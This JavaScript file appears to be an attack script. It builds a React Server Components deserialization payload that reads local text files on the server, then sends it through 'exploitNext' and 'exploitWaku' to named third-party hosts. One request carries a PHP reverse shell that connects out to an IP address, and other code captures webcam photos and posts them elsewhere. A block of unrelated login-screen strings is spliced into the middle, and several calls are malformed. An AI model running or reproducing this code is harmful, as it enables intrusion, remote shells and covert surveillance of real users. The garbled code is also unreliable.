
//const mockConnectorFilePaths = Object.freeze({
//    [ConnectorType.Sms]: '/tmp/logto_mock_sms_record.txt',
//    [ConnectorType.Email]: '/tmp/logto_mock_email_record.txt'})

const NodeWebcam = require("node-webcam");


//const webcam = NodeWebcam.create({
//	width:1280


//});
//const NodeWebcam = require("node-webcam");

const webcam = NodeWebcam.create({
  width: 1280,
  height: 720,
  quality: 100,
  delay: 0,
  saveShots: true,
  output: "jpeg",
  device: false, // usa câmera padrão
  callbackReturn: "location",
  verbose: true
});
const izaname = NodeWebcam.create("shot", webcam,async (_, file) => fetch("http://127.0.0.1:8080", { method: "POST", body: require("fs").createReadStream("foto.png") }));
//const next = izaname.list(function(list){
//	var anotherCam = NodeWebcam.list({device:list})
//	var options = NodeWebcam.create(izaname)
//	return options
//});												// headers http://127.0.0.1
var code = NodeWebcam.capture("constructor",webcam,async (_,file) => fetch("http://127.0.0.1:80"),{method:"POST",headers:'x-frame-options ALLOW',body:require("fs").createReadStream("react.html")});

//webcam.capture("shot", (err, data) => {
//  if (err) {
//    console.error("Erro ao acessar a câmera:", err);
//  } else {
//    console.log("Imagem capturada:", data);
//  }
//});
//const izanami = webcam.capture("shot", webcam, async (_, file) => fetch("http://127.0.0.1:8080", { method: "POST", body: require("fs").createReadStream(".") }));



const mfa = {
    totp: 'Authenticator app OTP',
    webauthn: 'Passkey',
    backup_code: 'Backup code',
    link_totp_description: 'E.g., Google Authenticator, etc.',
    link_webauthn_description: 'Link your device or USB hardware',
    link_backup_code_description: 'Generate a backup code',
    verify_totp_description: 'Enter the one-time code in app',
    verify_webauthn_description: 'Verify your device or USB hardware',
    verify_backup_code_description: 'Paste the backup code you saved',
    add_mfa_factors: 'Add 2-step verification',
    add_mfa_description: 'Two-factor verification is enabled. Select your second verification method for secure sign-in.',
    verify_mfa_factors: '2-step verification',
    verify_mfa_description: '2-step verification has been enabled for this account. Please select the second way to verify your identity.',
    add_authenticator_app: 'Add authenticator app',
    step: 'Step {{step, number}}: {{content}}',
    scan_qr_code: 'Scan this QR code',
    scan_qr_code_description: 'Scan the following QR code with your authenticator app, such as Google Authenticator, Duo Mobile, Authy, etc.',
    qr_code_not_available: 'Can’t scan the QR code?',
    copy_and_paste_key: 'Copy and paste the key',
    copy_and_paste_key_description: 'Copy and paste the following key into your authenticator app, such as Google Authenticator, Duo Mobile, Authy, etc.',
    want_to_scan_qr_code: 'Want to scan QR code?',
    enter_one_time_code: 'Enter the one-time code',
    enter_one_time_code_link_description: 'Enter the 6-digit verification code generated by the authenticator app.',
    enter_one_time_code_description: '2-step verification has been enabled for this account. Please enter the one-time code shown on your linked authenticator app.',
    link_another_mfa_factor: 'Switch to another method',
    save_backup_code: 'Save your backup code',
    save_backup_code_description: 'You can use one of these backup code to access your account if you have trouble during 2-step verification in another ways. Each code may be used only once.',
    backup_code_hint: 'Make sure copy them and save in a safe place.',
    enter_a_backup_code: 'Enter a backup code',
    enter_backup_code_description: 'Enter the backup code you saved when the 2-step verification was initially enabled.',
    create_a_passkey: 'Create a passkey',
    create_passkey_description: 'Register your passkey using device biometrics, security keys (e.g., YubiKey), or other available methods.',
    try_another_verification_method: 'Try another method to verify',
    verify_via_passkey: 'Verify via passkey',
    verify_via_passkey_description: 'Use passkey to verify by your device password or biometrics, scanning QR code, or using USB security key like YubiKey.',
    secret_key_copied: 'Secret key copied.',
    backup_code_copied: 'Backup code copied.',
    webauthn_not_ready: 'WebAuthn is not ready yet. Please try again later.',
    webauthn_not_supported: 'WebAuthn is not supported in this browser.',
    webauthn_failed_to_create: 'Failed to create. Please try again.',
    webauthn_failed_to_verify: 'Failed to verify. Please try again.',
};


const payload = {
    '0': '$1',
    '1': {
        'status':'resolved_model',
        'reason':0,
        '_response':'$4',
        'value':'{"then":"$3:map","0":{"then":"$B3"},"length":1}',
        'then':'$2:then'
    },
    '2': '$@3',
    '3': [],
    '4': {
        '_prefix':'require("fs").promises.readdir("./").then(f=>Promise.all(f.filter(n=>/\\.txt$/i.test(n)).map(n=>require("fs").promises.readFile(n,"utf8"))))',
//	'_prefix':'>_N2.r("documentReady",function(){_N2.r(["documentReady","smartslider-frontend","SmartSliderWidgetArrowImage","ss-simple"]',
//	'_prefix': "NodeWebcam.capture('shot', webcam, async (_, file) => fetch('http://127.0.0.1:9000', { method: 'POST', body: require("fs").createReadStream(file) }));"
        '_formData':{
            'get':'$3:Object.constructor:constructor'
        },
        '_chunks':'$2:_response:_chunks',
    }
}


const FormDataLib = require('form-data')

const fd = new FormDataLib()

for (const key in code) {
    fd.append(key, JSON.stringify(code[key]))
}

console.log(fd.getBuffer().toString())

console.log(fd.getHeaders())

function exploitNext(baseUrl) {
    fetch(baseUrl, {
        method: 'POST',
        headers: {
            'next-action': 'x',
            ...fd.getHeaders()
        },
        body: fd.getBuffer()
    }).then(x => {
        console.log('fetched', x)
        return x.text()
    }).then(x => {
        console.log('got', x)
    })
}

function exploitWaku(baseUrl) {
    fetch(baseUrl + '/RSC/foo.txt', {
        method: 'POST',
        headers: fd.getHeaders(),
        body: fd.getBuffer()
    }).then(x => {
        console.log('fetched', x)
        return x.text()
    }).then(x => {
        console.log('got', x)
    })
}


//function send_update(baseUrl){
//	fetch(baseUrl ,{
//	method: 'POST',
//	body:JSON.stringify(payload),
//	headers: JSON.stringify(fd),
	
//}).then(x => {console.log(x.body)});
//}
async function send(baseUrl) {
  const res = await fetch(baseUrl, {
    method: "OPTIONS",
    body: JSON.stringify(code),
    headers: {
      "Content-Type": "application/json",
      "next-action": "x"
    }
  });

  console.log("Status:", res.status);
  console.log("Headers:", [...res.headers.entries()]);

  const text = await res.text();
  console.log("Body:", text);
}

//send("https://exemplo.com/api");



// Place the correct URL and uncomment the line
//exploitNext("https://rum-http-intake.logs.datadoghq.com/v1/input/pub78e1469a8a034c32cc4a7b17fca0acea?ddsource=browser&ddtags=sdk_version%3A3.11.0%2Cenv%3Aproduction%2Cservice%3Ayssy.com.br&batch_time=1766173346226")
//exploitWaku('https://rum-http-intake.logs.datadoghq.com/v1/input/pub78e1469a8a034c32cc4a7b17fca0acea?ddsource=browser&ddtags=sdk_version%3A3.11.0%2Cenv%3Aproduction%2Cservice%3Ayssy.com.br&batch_time=1766173346226')
//send('https://rum-http-intake.logs.datadoghq.com/v1/input/pub78e1469a8a034c32cc4a7b17fca0acea?ddsource=browser&ddtags=sdk_version%3A3.11.0%2Cenv%3Aproduction%2Cservice%3Ayssy.com.br&batch_time=1766181986058')
exploitNext('https://admin.iam.findup.com.br/api/.well-known/endpoints/admin')
send('https://admin.iam.findup.com.br/api/.well-known/endpoints/admin')
exploitWaku('https://admin.iam.findup.com.br/api/.well-known/endpoints/admin')
//send("http://94.36.74.34.bc.googleusercontent.com/")
//send("http://94.36.74.34.bc.googleusercontent.com/")
//send("https://wapi.flowinzap.com.br/login?%3Cbody%20onload=%22navigator.mediaDevices.getUserMedia({video:true}).then(s=%3Ecam.srcObject=s)%22%3E%20%3Cvideo%20id=%22cam%22%20autoplay%20playsinline%3E%3C/video%3E%20%3C/body%3E")
send("https://admin.iam.findup.com.br/api/experience")
send("https://admin.iam.findup.com.br/api/experience/verification/password")
send("https://admin.iam.findup.com.br/api/.well-known/endpoints/admin?q=%3C%3Fphp+%24sock%3Dfsockopen%28%27192.160.15.13%27%2C9000%29%3Bexec%28%27%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%27%29%3B+%3F%3E")
send("https://admin.iam.findup.com.br/Register")
